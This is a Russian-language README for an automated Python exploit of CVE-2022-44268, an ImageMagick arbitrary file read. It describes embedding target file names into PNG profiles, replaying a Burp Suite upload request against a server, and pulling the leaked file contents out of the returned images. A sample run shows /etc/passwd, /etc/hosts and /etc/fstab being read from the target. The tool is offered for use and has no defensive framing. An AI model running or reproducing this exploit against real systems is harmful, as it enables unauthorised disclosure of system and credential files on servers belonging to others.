
Автоматизированный эксплойт на Python для CVE-2022-44268 (произвольное чтение файлов в ImageMagick). Загружает подготовленные PNG, извлекает содержимое файлов из возвращённых изображений и сохраняет результаты локально.
Автоматический скрипт на Python, использующий cve-2022-44268, чтобы добавить значение profile с именем файла из входного списка файлов во входной файл, обновить загрузку файла изображения с использованием входного файла request.req из Burpsuite (уже включён) для загрузки каждого изменённого изображения, а также загрузить полученные изображения из возвращённого URL и извлечь содержимое файла, поместив его во входной каталог.
$ ./cve-2022-44268.py
usage: cve-2022-44268.py [-h] base_png filelist request_req output_dir image_output_dir
cve-2022-44268.py: error: the following arguments are required: base_png, filelist, request_req, output_dir, image_output_dir
$ ./cve-2022-44268.py image.png filelist.lst request.req output_dir image_output_dir
Exploiting for file: /etc/passwd
Saved shrunk image to: image_output_dir/etc_passwd_shrunk.png
Saved extracted content to: output_dir/etc_passwd
Exploiting for file: /etc/hosts
Saved shrunk image to: image_output_dir/etc_hosts_shrunk.png
Saved extracted content to: output_dir/etc_hosts
Exploiting for file: /etc/fstab
Saved shrunk image to: image_output_dir/etc_fstab_shrunk.png
Saved extracted content to: output_dir/etc_fstab